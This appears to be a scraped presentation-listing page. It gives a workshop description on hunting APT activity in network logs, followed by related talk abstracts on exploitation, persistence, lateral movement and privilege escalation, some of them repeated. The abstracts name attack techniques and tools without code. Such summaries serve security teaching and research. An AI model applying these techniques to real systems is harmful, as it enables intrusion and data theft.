Hunting for APT in network logs workshop presentationOlehLevytskyi1
Nonamecon 2021 presentation.
Network logs are one of the most efficient sources to hunt adversaries, but building good analytics capabilities require a deep understanding of benign activity and attacker behavior. This training focuses on detecting real-case attacks, tools and scenarios by the past year.
The training is highly interactive and retains a good balance between theory and a lot of hands-on exercises for the students to get used to the detection engineering methodology and prepare them to start implementing this at their organizations.
Presentation topics:
- Netflow Mitre Matrix view
- Full packet captures vs Netflow
- Zeek
- Zeek packages
- RDP initial comprometation
- Empire Powershell and CobaltStrike or what to expect after initial loader execution.
- Empire powershell initial connection
- Beaconing. RITA
- Scanning detection
- Internal enumeration detection
- Lateral movement techniques widely used
- Kerberos attacks
- PSExec and fileless ways of delivering payloads in the network
- Zerologon detection
- Data exfiltration
- Data exfiltration over C2 channel
- Data exfiltration using time size limits (data chunks)
- DNS exfiltration
- Detecting ransomware in your network
- Real incident investigation
Authors:
Oleh Levytskyi (https://twitter.com/LeOleg97)
Bogdan Vennyk (https://twitter.com/bogdanvennyk)
This talk focuses on various ways to attempt to be as much like normal users/behavior/traffic as possible. We also demonstrate the limitations of signature-based detection systems and then discuss a prototype Remote Access Tool (RAT) that is designed to blend in with normal activity.
Presented at CodeMash, January 8, 2014
This document discusses various techniques for exploiting UNIX executable programs, including buffer overflow vulnerabilities. It begins with an introduction and outlines an agenda covering vulnerable UNIX applications, memory layout and stacks, buffer overflows, shellcode, and various protection mechanisms and bypass techniques. These include basic stack overflows, bypassing password protections, limited stack spaces, Ret-2-libc exploits, and return-oriented programming (ROP) chains to execute multiple commands. Demo exploits are proposed to show gaining root privilege on vulnerable applications.
This document provides an overview of fuzzing techniques and the Sulley fuzzing framework. It begins with definitions of fuzzing and different fuzzing techniques like static testing, randomized fuzzing, and mutation-based fuzzing. The rest of the document demonstrates how to setup and use the Sulley framework to fuzz protocols like HTTP and file formats. It includes explanations of the Sulley API and how to generate test cases, monitor for crashes, and analyze results. Examples are provided of fuzzing HTTP servers and file formats.
This document provides instructions for hacking into various targets on a network to retrieve flags. It includes steps like port scanning with Nmap, cracking passwords, exploiting vulnerabilities like SQL injection and file inclusion, and using tools like Hydra, Burp Suite, and Metasploit to retrieve hashes, escalate privileges, and access remote systems. The flags are stored on the target systems in files or application interfaces.
Possibility of arbitrary code execution by Step-Oriented Programmingkozossakai
Step-Oriented Programming (SOP) allows executing arbitrary code on embedded systems by repeating step execution and changing the program counter value. A debugger communicates with a target system's stub using the Remote Serial Protocol to read/write memory and registers, enabling full control via simple commands if the connection is compromised. SOP constructs code by combining pieces of existing machine code and executes it without needing to directly inject new code. Therefore attacks are possible even if execution from data areas is prevented. The presentation will demonstrate this attack principle and results from actual experimentation.
Hunting for APT in network logs workshop presentationOlehLevytskyi1
Nonamecon 2021 presentation.
Network logs are one of the most efficient sources to hunt adversaries, but building good analytics capabilities require a deep understanding of benign activity and attacker behavior. This training focuses on detecting real-case attacks, tools and scenarios by the past year.
The training is highly interactive and retains a good balance between theory and a lot of hands-on exercises for the students to get used to the detection engineering methodology and prepare them to start implementing this at their organizations.
Presentation topics:
- Netflow Mitre Matrix view
- Full packet captures vs Netflow
- Zeek
- Zeek packages
- RDP initial comprometation
- Empire Powershell and CobaltStrike or what to expect after initial loader execution.
- Empire powershell initial connection
- Beaconing. RITA
- Scanning detection
- Internal enumeration detection
- Lateral movement techniques widely used
- Kerberos attacks
- PSExec and fileless ways of delivering payloads in the network
- Zerologon detection
- Data exfiltration
- Data exfiltration over C2 channel
- Data exfiltration using time size limits (data chunks)
- DNS exfiltration
- Detecting ransomware in your network
- Real incident investigation
Authors:
Oleh Levytskyi (https://twitter.com/LeOleg97)
Bogdan Vennyk (https://twitter.com/bogdanvennyk)
This talk focuses on various ways to attempt to be as much like normal users/behavior/traffic as possible. We also demonstrate the limitations of signature-based detection systems and then discuss a prototype Remote Access Tool (RAT) that is designed to blend in with normal activity.
Presented at CodeMash, January 8, 2014
This document discusses various techniques for exploiting UNIX executable programs, including buffer overflow vulnerabilities. It begins with an introduction and outlines an agenda covering vulnerable UNIX applications, memory layout and stacks, buffer overflows, shellcode, and various protection mechanisms and bypass techniques. These include basic stack overflows, bypassing password protections, limited stack spaces, Ret-2-libc exploits, and return-oriented programming (ROP) chains to execute multiple commands. Demo exploits are proposed to show gaining root privilege on vulnerable applications.
This document provides an overview of fuzzing techniques and the Sulley fuzzing framework. It begins with definitions of fuzzing and different fuzzing techniques like static testing, randomized fuzzing, and mutation-based fuzzing. The rest of the document demonstrates how to setup and use the Sulley framework to fuzz protocols like HTTP and file formats. It includes explanations of the Sulley API and how to generate test cases, monitor for crashes, and analyze results. Examples are provided of fuzzing HTTP servers and file formats.
This document provides instructions for hacking into various targets on a network to retrieve flags. It includes steps like port scanning with Nmap, cracking passwords, exploiting vulnerabilities like SQL injection and file inclusion, and using tools like Hydra, Burp Suite, and Metasploit to retrieve hashes, escalate privileges, and access remote systems. The flags are stored on the target systems in files or application interfaces.
Possibility of arbitrary code execution by Step-Oriented Programmingkozossakai
Step-Oriented Programming (SOP) allows executing arbitrary code on embedded systems by repeating step execution and changing the program counter value. A debugger communicates with a target system's stub using the Remote Serial Protocol to read/write memory and registers, enabling full control via simple commands if the connection is compromised. SOP constructs code by combining pieces of existing machine code and executes it without needing to directly inject new code. Therefore attacks are possible even if execution from data areas is prevented. The presentation will demonstrate this attack principle and results from actual experimentation.
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
The document discusses exploiting vulnerabilities in wireless routers that have USB ports for sharing storage and printers. It describes conducting attacks against a D-Link wireless router to steal data, delete data, and implant backdoors by accessing the shared USB flash drive and printer through the router's vulnerable SharePort technology. The attacker scans the wireless network, identifies the router and connected USB devices, and then explores ways to hack into the shared resources and conduct unauthorized activities.
Monit is a utility that monitors processes, files, directories, and devices on a Unix system. It conducts automatic maintenance and repair. Monit can start processes that are not running, restart processes that are not responding, and stop processes that are using too many resources. It monitors services and items for changes and errors, and can send alerts about issues. Monit is configured via a control file and can monitor both local and remote systems. It provides a web interface for accessing status information.
This document provides an overview of several security tools including Nikto, Burp Suite, Wikto, Nmap, Metasploit, Nessus, OpenVAS, and how some of them relate to and integrate with Nikto. It describes Nikto as a web server scanner that checks for vulnerabilities. It then briefly introduces each of the other tools, their purpose, and in some cases how they can work with Nikto, such as Nikto being able to use Nmap scan results or output results to Metasploit's database.
Indicators of compromise: From malware analysis to eradicationMichael Boman
This document discusses detecting and analyzing indicators of compromise from a malware infection. It describes collecting data from firewalls, IDS/IPS, proxies, DNS logs, and system logs to detect suspicious activity. Once a potential malware sample is acquired, static and dynamic analysis techniques are used to analyze its behavior and identify indicators that can be used to detect infected machines, like created files, registry keys, and network traffic. These indicators are expressed using tools like Yara rules and Snort signatures to enable detection of the compromise across an environment.
The document discusses techniques for conducting a "grey-box" attack on Windows and Linux systems. It covers scanning and enumeration of open ports and services using Nmap to identify vulnerabilities. It then discusses methods for gaining initial access, including exploiting the null session vulnerability in Windows 2000 to enumerate user accounts. It also discusses privilege escalation techniques to gain full control of compromised systems. The document provides examples using Nmap and Metasploit to automate vulnerability scanning and exploitation.
This document discusses various options for centralized logging, including using syslog, Monolog, and logging software like Graylog. It provides examples of logging from PHP, MySQL, and Apache to a remote syslog server using Monolog and a FIFO pipe. Centralized logging with a software like Graylog allows for unified logging, search, alerts and reporting across multiple systems.
Laura Garcia - Shodan API and Coding Skills [rooted2019]RootedCON
Laura García presents shodan-seeker, a Python tool she created for interacting with the Shodan API. The tool allows users to scan IP addresses and networks, get information on IPs from Shodan's database, detect new services, create and manage alerts, and subscribe to the streaming API. Some key features highlighted are diffing to detect new open ports, generating reports without consuming API credits, and full customization of input data, outputs, and alerts. Technical issues that may occur and how to address them are also covered.
The document provides instructions on how to configure an SSH server on Linux, perform footprinting and reconnaissance, scanning tools and techniques, enumeration tools and techniques, password cracking techniques and tools, privilege escalation methods, and keylogging and hidden file techniques. It discusses active and passive footprinting, Nmap port scanning, NetBIOS and SNMP enumeration, Windows password hashes, the sticky keys method for privilege escalation, ActualSpy keylogging software, and hiding files using NTFS alternate data streams. Countermeasures for many of these techniques are also outlined.
The document discusses footprinting techniques for security auditors. It covers gathering publicly available information about targets through tools like Whois, DNS lookups, search engines and network mappers to identify domains, IP addresses, systems and names. It then discusses active footprinting using port scanners like NMAP to detect open ports and services, identify operating systems and check for vulnerabilities. NMAP scripts can automate tasks like banner grabbing, HTTP enumeration and vulnerability detection for services like MySQL. Other tools mentioned include Maltego, Shodan, Censys and the NSE script library for more advanced information gathering.
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...CODE BLUE
In this talk, we are going to disclose two unconventional Use-after-free kernel bugs on Android we found last year, and introduce the new techniques we used to make these exploits 100% reliable.
The first bug is CVE-2017-0403, which we used to gain root privilege on almost all devices shipped with 3.10 or earlier Linux kernel last year. So far more than 14 million users have successfully rooted their smartphones with this exploit. With this vulnerability, an attacker only can overwrite the freed object at a fixed offset with a pointer to object itself. How to achieve kernel code execution with this bug can be very challenging.To solve the problem, we propose a new method which is using iovec to re-fill the freed object and compromising the pipe subsystem in kernel.In this way we can covert this unusual memory corruption to arbitrary kernel memory overwriting.
The second bug is CVE-2016-6787. The bug is an UAF due to race condition, may corrupt a critical kernel structure, and lead to the kernel crash when scheduler switched context back to attacker's process. So we'll introduce a way to freeze the attacker's process soon after UAF happened ,stop kernel from crashing, and make the exploit reliable.
In summary, this presentation gives out the new techniques of exploiting use-after-free bugs we just found in Android kernel. The ideas of exploitation are fresh, detail of bugs is also never discussed before.
Richard wartell malware is hard. let's go shopping!!Shakacon
Writing a successful, protected, targeted, malicious binary is a software development task that requires great skill. A well-written piece of targeted malware should evade anti-virus solutions, hide its network communications, protect itself against reverse engineering, and clean up any forensic evidence of its existence on the system. However, writing a mediocre piece of targeted malware that works most of the time is easy. There are many publicly available backdoors, downloaders, and keyloggers that require little to no expertise to use, and poorly trained malware authors try to roll their own all the time.
Working in malware detection and reverse engineering, I see some of the intelligent choices malware authors make, but more often I see the hilariously poor code they write. During this talk I will demonstrate how to reverse engineer real world malware. I will focus on samples with interesting and comical mistakes, as well as samples that are impressive and well written.
This document provides an introduction and overview to using the BackTrack 4 penetration testing Linux distribution. It discusses the backgrounds of the presenters Jorge Orchilles and Peter Greko. It then outlines how to install and configure BackTrack, demonstrating some initial reconnaissance tools like nmap. It provides a sample penetration testing scenario, walking through information gathering, vulnerability scanning with Nessus and Nikto, gaining initial access via password cracking, and privilege escalation. The presentation emphasizes the importance of permission, documentation, and problem-solving to advance in a scenario.
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...CODE BLUE
We propose a new exploit technique that brings a whole-new attack surface to bypass SSRF (Server Side Request Forgery) protections. This is a very general attack approach, in which we used in combination with our own fuzzing tool to discover many 0days in built-in libraries of very widely-used programming languages, including Python, PHP, Perl, Ruby, Java, JavaScript, Wget and cURL. The root cause of the problem lies in the inconsistency of URL parsers and URL requesters.
Being a very fundamental problem that exists in built-in libraries, sophisticated web applications such as WordPress (27% of the Web), vBulletin, MyBB and GitHub can also suffer, and 0days have been discovered in them via this technique. This general technique can also adapt to various code contexts and lead to protocol smuggling and SSRF bypassing. Several scenarios will be demonstrated to illustrate how URL parsers can be exploited to bypass SSRF protection and achieve RCE (Remote Code Execution), which is the case in our GitHub Enterprise demo.
Understanding the basics of this technique, the audience won’t be surprised to know that more than 20 vulnerabilities have been found in famous programming languages and web applications aforementioned via this technique.
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where the hacker/penetration-tester has deployed a malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.) On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall after one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
TRENDnet IP Camera Multiple Vulnerabilitiesinsight-labs
1. The TRENDnet IP camera models TV-IP422W contains multiple vulnerabilities, including an arbitrary file upload vulnerability that allows attackers to upload malicious files like webshells to the device.
2. The camera stores its configuration file unencrypted except for a simple bitwise NOT and XOR encryption that is easily reversible. This exposes passwords and credentials to attackers.
3. The SecurViewMobile Android app for the camera stores passwords and credentials in plaintext in an insecure manner, allowing extraction from its database.
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...RootedCON
The document discusses various techniques for achieving persistence on a Windows system without administrator privileges. These include hijacking shell extensions and COM objects by modifying registry keys, taking advantage of globally unique identifiers (GUIDs) and paths stored in the registry. The document recommends hijacking extension handlers and using PowerShell to bypass restrictions when writing to the registry for stealthier persistence.
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
Michal will take you on a journey all the way to 90’s and back, sharing the Mozilla detection framework - a systematic way to detect and hunt down threat actors. Why did we spend hours digging through some old Phrack issues? How does a blue team's member approach writing rootkits? What is better - a fail negative or a false positive? I will share answers to these questions plus a lot of alerting and evil-doing code.
Monit is an open source tool that monitors systems and applications and automatically restarts services if they fail or exceed configurable resource limits. It can monitor files, directories, processes, hosts, and custom scripts/programs. Monit is configured via a global configuration file and additional files for specific checks. It can monitor system resources, file integrity, network interfaces, remote hosts, and check for service dependencies. Monit also includes a web interface for monitoring and management.
PyCon India 2009 Presentation Python tools for Network Security
The document discusses various Python tools for network security including Pypcap, Dpkt and Scapy. It provides an overview of packet capture and inspection capabilities of these tools and code examples to capture and analyze network packets. Specific examples demonstrated include an HTTP protocol sniffer, host scanning and DNS queries using Scapy.
Powershella lubią admini, programiści, a najbardziej hakerzy. Będąc natywną powłoką systemów Windows nie rzuca się w oczy, jednocześnie dając ogromne możliwości ofensywne. Podczas prelekcji Paweł zaprezentuje zarówno skuteczne one-linery jak i wielolinijkowe skrypty, które mogą siać spustoszenie w nieprzygotowanej organizacji. Pojawią się ciekawe kanały C2, malware napisany w całości w Powershellu, wyszukiwanie i eksploitacja słabo skonfigurowanych serwerów MSSQL etc.100% mięsa.
40 Methods for Privilege Escalation - Part 1
Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.
The first part of Privilege escalation methods with complete Descriptions:
1. Abusing Sudo Binaries
2. Abusing Scheduled Tasks
3. Golden Ticket With Scheduled Tasks
4. Abusing Interpreter Capabilities
5. Abusing Binary Capabilities
6. Abusing ActiveSessions Capabilities
7. Escalate with TRUSTWORTHY in SQL Server
8. Abusing Mysql run as root
9. Abusing journalctl
10. Abusing VDS
11. Abusing Browser
12. Abusing LDAP
13. LLMNR Poisoning
14. Abusing Certificate Services
15. MySQL UDF Code Injection
16. Impersonation Token with ImpersonateLoggedOnuser
17. Impersonation Token with SeImpersontePrivilege
18. Impersonation Token with SeLoadDriverPrivilege
19. OpenVPN Credentials
20. Bash History
21. Package Capture
22. NFS Root Squashing
23. Abusing Access Control List
24. Escalate With SeBackupPrivilege
25. Escalate With SeImpersonatePrivilege
26. Escalate With SeLoadDriverPrivilege
27. Escalate With ForceChangePassword
28. Escalate With GenericWrite
29. Abusing GPO
30. Pass-the-Ticket
31. Golden Ticket
32. Abusing Splunk Universal Forwarder
33. Abusing Gdbus
34. Abusing Trusted DC
35. NTLM Relay
36. Exchange Relay
37. Dumping with diskshadow
38. Dumping with vssadmin
39. Password Spraying
40. AS-REP Roasting Kerberoasting
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
The document discusses exploiting vulnerabilities in wireless routers that have USB ports for sharing storage and printers. It describes conducting attacks against a D-Link wireless router to steal data, delete data, and implant backdoors by accessing the shared USB flash drive and printer through the router's vulnerable SharePort technology. The attacker scans the wireless network, identifies the router and connected USB devices, and then explores ways to hack into the shared resources and conduct unauthorized activities.
Monit is a utility that monitors processes, files, directories, and devices on a Unix system. It conducts automatic maintenance and repair. Monit can start processes that are not running, restart processes that are not responding, and stop processes that are using too many resources. It monitors services and items for changes and errors, and can send alerts about issues. Monit is configured via a control file and can monitor both local and remote systems. It provides a web interface for accessing status information.
This document provides an overview of several security tools including Nikto, Burp Suite, Wikto, Nmap, Metasploit, Nessus, OpenVAS, and how some of them relate to and integrate with Nikto. It describes Nikto as a web server scanner that checks for vulnerabilities. It then briefly introduces each of the other tools, their purpose, and in some cases how they can work with Nikto, such as Nikto being able to use Nmap scan results or output results to Metasploit's database.
Indicators of compromise: From malware analysis to eradicationMichael Boman
This document discusses detecting and analyzing indicators of compromise from a malware infection. It describes collecting data from firewalls, IDS/IPS, proxies, DNS logs, and system logs to detect suspicious activity. Once a potential malware sample is acquired, static and dynamic analysis techniques are used to analyze its behavior and identify indicators that can be used to detect infected machines, like created files, registry keys, and network traffic. These indicators are expressed using tools like Yara rules and Snort signatures to enable detection of the compromise across an environment.
The document discusses techniques for conducting a "grey-box" attack on Windows and Linux systems. It covers scanning and enumeration of open ports and services using Nmap to identify vulnerabilities. It then discusses methods for gaining initial access, including exploiting the null session vulnerability in Windows 2000 to enumerate user accounts. It also discusses privilege escalation techniques to gain full control of compromised systems. The document provides examples using Nmap and Metasploit to automate vulnerability scanning and exploitation.
This document discusses various options for centralized logging, including using syslog, Monolog, and logging software like Graylog. It provides examples of logging from PHP, MySQL, and Apache to a remote syslog server using Monolog and a FIFO pipe. Centralized logging with a software like Graylog allows for unified logging, search, alerts and reporting across multiple systems.
Laura Garcia - Shodan API and Coding Skills [rooted2019]RootedCON
Laura García presents shodan-seeker, a Python tool she created for interacting with the Shodan API. The tool allows users to scan IP addresses and networks, get information on IPs from Shodan's database, detect new services, create and manage alerts, and subscribe to the streaming API. Some key features highlighted are diffing to detect new open ports, generating reports without consuming API credits, and full customization of input data, outputs, and alerts. Technical issues that may occur and how to address them are also covered.
The document provides instructions on how to configure an SSH server on Linux, perform footprinting and reconnaissance, scanning tools and techniques, enumeration tools and techniques, password cracking techniques and tools, privilege escalation methods, and keylogging and hidden file techniques. It discusses active and passive footprinting, Nmap port scanning, NetBIOS and SNMP enumeration, Windows password hashes, the sticky keys method for privilege escalation, ActualSpy keylogging software, and hiding files using NTFS alternate data streams. Countermeasures for many of these techniques are also outlined.
The document discusses footprinting techniques for security auditors. It covers gathering publicly available information about targets through tools like Whois, DNS lookups, search engines and network mappers to identify domains, IP addresses, systems and names. It then discusses active footprinting using port scanners like NMAP to detect open ports and services, identify operating systems and check for vulnerabilities. NMAP scripts can automate tasks like banner grabbing, HTTP enumeration and vulnerability detection for services like MySQL. Other tools mentioned include Maltego, Shodan, Censys and the NSE script library for more advanced information gathering.
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...CODE BLUE
In this talk, we are going to disclose two unconventional Use-after-free kernel bugs on Android we found last year, and introduce the new techniques we used to make these exploits 100% reliable.
The first bug is CVE-2017-0403, which we used to gain root privilege on almost all devices shipped with 3.10 or earlier Linux kernel last year. So far more than 14 million users have successfully rooted their smartphones with this exploit. With this vulnerability, an attacker only can overwrite the freed object at a fixed offset with a pointer to object itself. How to achieve kernel code execution with this bug can be very challenging.To solve the problem, we propose a new method which is using iovec to re-fill the freed object and compromising the pipe subsystem in kernel.In this way we can covert this unusual memory corruption to arbitrary kernel memory overwriting.
The second bug is CVE-2016-6787. The bug is an UAF due to race condition, may corrupt a critical kernel structure, and lead to the kernel crash when scheduler switched context back to attacker's process. So we'll introduce a way to freeze the attacker's process soon after UAF happened ,stop kernel from crashing, and make the exploit reliable.
In summary, this presentation gives out the new techniques of exploiting use-after-free bugs we just found in Android kernel. The ideas of exploitation are fresh, detail of bugs is also never discussed before.
Richard wartell malware is hard. let's go shopping!!Shakacon
Writing a successful, protected, targeted, malicious binary is a software development task that requires great skill. A well-written piece of targeted malware should evade anti-virus solutions, hide its network communications, protect itself against reverse engineering, and clean up any forensic evidence of its existence on the system. However, writing a mediocre piece of targeted malware that works most of the time is easy. There are many publicly available backdoors, downloaders, and keyloggers that require little to no expertise to use, and poorly trained malware authors try to roll their own all the time.
Working in malware detection and reverse engineering, I see some of the intelligent choices malware authors make, but more often I see the hilariously poor code they write. During this talk I will demonstrate how to reverse engineer real world malware. I will focus on samples with interesting and comical mistakes, as well as samples that are impressive and well written.
This document provides an introduction and overview to using the BackTrack 4 penetration testing Linux distribution. It discusses the backgrounds of the presenters Jorge Orchilles and Peter Greko. It then outlines how to install and configure BackTrack, demonstrating some initial reconnaissance tools like nmap. It provides a sample penetration testing scenario, walking through information gathering, vulnerability scanning with Nessus and Nikto, gaining initial access via password cracking, and privilege escalation. The presentation emphasizes the importance of permission, documentation, and problem-solving to advance in a scenario.
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...CODE BLUE
We propose a new exploit technique that brings a whole-new attack surface to bypass SSRF (Server Side Request Forgery) protections. This is a very general attack approach, in which we used in combination with our own fuzzing tool to discover many 0days in built-in libraries of very widely-used programming languages, including Python, PHP, Perl, Ruby, Java, JavaScript, Wget and cURL. The root cause of the problem lies in the inconsistency of URL parsers and URL requesters.
Being a very fundamental problem that exists in built-in libraries, sophisticated web applications such as WordPress (27% of the Web), vBulletin, MyBB and GitHub can also suffer, and 0days have been discovered in them via this technique. This general technique can also adapt to various code contexts and lead to protocol smuggling and SSRF bypassing. Several scenarios will be demonstrated to illustrate how URL parsers can be exploited to bypass SSRF protection and achieve RCE (Remote Code Execution), which is the case in our GitHub Enterprise demo.
Understanding the basics of this technique, the audience won’t be surprised to know that more than 20 vulnerabilities have been found in famous programming languages and web applications aforementioned via this technique.
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where the hacker/penetration-tester has deployed a malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.) On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall after one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
TRENDnet IP Camera Multiple Vulnerabilitiesinsight-labs
1. The TRENDnet IP camera models TV-IP422W contains multiple vulnerabilities, including an arbitrary file upload vulnerability that allows attackers to upload malicious files like webshells to the device.
2. The camera stores its configuration file unencrypted except for a simple bitwise NOT and XOR encryption that is easily reversible. This exposes passwords and credentials to attackers.
3. The SecurViewMobile Android app for the camera stores passwords and credentials in plaintext in an insecure manner, allowing extraction from its database.
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...RootedCON
The document discusses various techniques for achieving persistence on a Windows system without administrator privileges. These include hijacking shell extensions and COM objects by modifying registry keys, taking advantage of globally unique identifiers (GUIDs) and paths stored in the registry. The document recommends hijacking extension handlers and using PowerShell to bypass restrictions when writing to the registry for stealthier persistence.
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
Michal will take you on a journey all the way to 90’s and back, sharing the Mozilla detection framework - a systematic way to detect and hunt down threat actors. Why did we spend hours digging through some old Phrack issues? How does a blue team's member approach writing rootkits? What is better - a fail negative or a false positive? I will share answers to these questions plus a lot of alerting and evil-doing code.
Monit is an open source tool that monitors systems and applications and automatically restarts services if they fail or exceed configurable resource limits. It can monitor files, directories, processes, hosts, and custom scripts/programs. Monit is configured via a global configuration file and additional files for specific checks. It can monitor system resources, file integrity, network interfaces, remote hosts, and check for service dependencies. Monit also includes a web interface for monitoring and management.
PyCon India 2009 Presentation Python tools for Network Security
The document discusses various Python tools for network security including Pypcap, Dpkt and Scapy. It provides an overview of packet capture and inspection capabilities of these tools and code examples to capture and analyze network packets. Specific examples demonstrated include an HTTP protocol sniffer, host scanning and DNS queries using Scapy.
Powershella lubią admini, programiści, a najbardziej hakerzy. Będąc natywną powłoką systemów Windows nie rzuca się w oczy, jednocześnie dając ogromne możliwości ofensywne. Podczas prelekcji Paweł zaprezentuje zarówno skuteczne one-linery jak i wielolinijkowe skrypty, które mogą siać spustoszenie w nieprzygotowanej organizacji. Pojawią się ciekawe kanały C2, malware napisany w całości w Powershellu, wyszukiwanie i eksploitacja słabo skonfigurowanych serwerów MSSQL etc.100% mięsa.
40 Methods for Privilege Escalation - Part 1
Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.
The first part of Privilege escalation methods with complete Descriptions:
1. Abusing Sudo Binaries
2. Abusing Scheduled Tasks
3. Golden Ticket With Scheduled Tasks
4. Abusing Interpreter Capabilities
5. Abusing Binary Capabilities
6. Abusing ActiveSessions Capabilities
7. Escalate with TRUSTWORTHY in SQL Server
8. Abusing Mysql run as root
9. Abusing journalctl
10. Abusing VDS
11. Abusing Browser
12. Abusing LDAP
13. LLMNR Poisoning
14. Abusing Certificate Services
15. MySQL UDF Code Injection
16. Impersonation Token with ImpersonateLoggedOnuser
17. Impersonation Token with SeImpersontePrivilege
18. Impersonation Token with SeLoadDriverPrivilege
19. OpenVPN Credentials
20. Bash History
21. Package Capture
22. NFS Root Squashing
23. Abusing Access Control List
24. Escalate With SeBackupPrivilege
25. Escalate With SeImpersonatePrivilege
26. Escalate With SeLoadDriverPrivilege
27. Escalate With ForceChangePassword
28. Escalate With GenericWrite
29. Abusing GPO
30. Pass-the-Ticket
31. Golden Ticket
32. Abusing Splunk Universal Forwarder
33. Abusing Gdbus
34. Abusing Trusted DC
35. NTLM Relay
36. Exchange Relay
37. Dumping with diskshadow
38. Dumping with vssadmin
39. Password Spraying
40. AS-REP Roasting Kerberoasting
Methods for Privilege Escalation Part One.pdfrimaNova1
The document provides 40 methods for privilege escalation on Linux and Windows systems, organized into different categories. Some of the methods involve abusing privileges of programs run as root like sudo, abusing interpreters with escalated capabilities, injecting code through SQL or Windows services, exploiting scheduled tasks, sniffing network traffic, enumerating bash history files, and more. Many of the techniques require finding and exploiting vulnerable configurations or bugs in programs or services to elevate privileges on the target system.
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
This document discusses techniques used by threat actors to move laterally within corporate networks. It begins with an introduction and covers post-exploitation techniques including Mimikatz for credential theft, Skeleton Key and Wdigest for password dumping, webshell deployment on IIS and Exchange servers, and other miscellaneous techniques such as abusing VPNs and using rootkits. Precautions are provided for each technique discussed.
Penetrating Windows 8 with syringe utilityIOSR Journals
This document discusses penetrating Windows 8 remotely using Metasploit framework and syringe utility. It begins with an introduction to penetration testing and Windows 8 security. It then describes using Metasploit to generate a payload, encoding it to evade detection, and injecting it into a Windows 8 system using syringe. This allows establishing a meterpreter session and compromising the system by migrating processes and accessing the C drive. It concludes that Windows 8 has strong security but syringe injections allow compromising it, and more exploits could be found to enhance efficacy.
This document discusses techniques for lateral movement that adversaries use to access and control remote systems on a network. It outlines various methods like exploiting vulnerabilities, abusing legitimate Windows features like Windows services, scheduled tasks, WMI, WinRM and DCOM. The document also discusses how blue teams can detect these techniques by monitoring authentication events, system events, object access logs, WMI activity and Windows remote management logs. It describes using tools like Oriana and frequency analysis to hunt for lateral movement indicators in Windows event logs collected via Windows Event Forwarding.
This document provides an overview and agenda for a Metasploit training session. It begins with a disclaimer that the information presented is for educational purposes only. The agenda includes introductions to Metasploit basics, information gathering, exploitation, Meterpreter basics and post-exploitation, Meterpreter scripts, Metasploit utilities like Msfpayload and Msfencode, client-side attacks, and auxiliary modules. Breaks for tea and lunch are also included on the agenda.
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitMauricio Velazco
After obtaining an initial foothold on an environment, attackers are forced to embark in lateral movement techniques in order to be successful in identifying and exfiltrating sensitive information. To stay ahead of the bad guys, the Blue team needs to have a clear understanding of these techniques as well as the forensic artifacts these techniques leave behind on the victim hosts. Armed with this knowledge, we can proactively hunt for lateral movement in the environment before exfiltration can occur. This presentation will analyze Lateral Movement from both a Red and Blue team perspective and introduce Oriana, a lateral movement hunting tool that can assist the Blue team in catching the adversary.
The document describes basic concepts related to machines, hosts, clients, servers, workstations, processes, daemons, distributed systems, and kernels. It then provides details about the boot PROM including its functions, components, configuration information storage, and commonly used commands. Finally, it outlines the boot PROM booting process and describes emergency sequences and diagnostic modes that can be accessed using stop key sequences.
Penetration Testing and Intrusion Detection SystemBikrant Gautam
This document provides an overview of penetration testing techniques, including forms of cyber attacks like buffer overflows and SQL injection. It discusses using Metasploit and other commercial tools like Canvas to conduct network penetration testing. It also covers post-exploitation techniques such as password cracking, privilege escalation, and data exfiltration. The goal of a penetration test is to simulate a real attack to evaluate system defenses and identify vulnerabilities.
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
The document discusses methods for identifying and investigating lateral movement by attackers during security incidents. It describes common tools and techniques used by attackers during different stages of an advanced persistent threat (APT) incident, including initial investigation, internal reconnaissance, spreading infection, and deleting evidence. The document analyzes logs and commands from past APT attacks to identify patterns in attacker behavior that can help with incident response. It notes that default system logs often do not provide enough information, so additional logging of events, processes, and network connections may be needed to fully trace attacker activities within a target network.
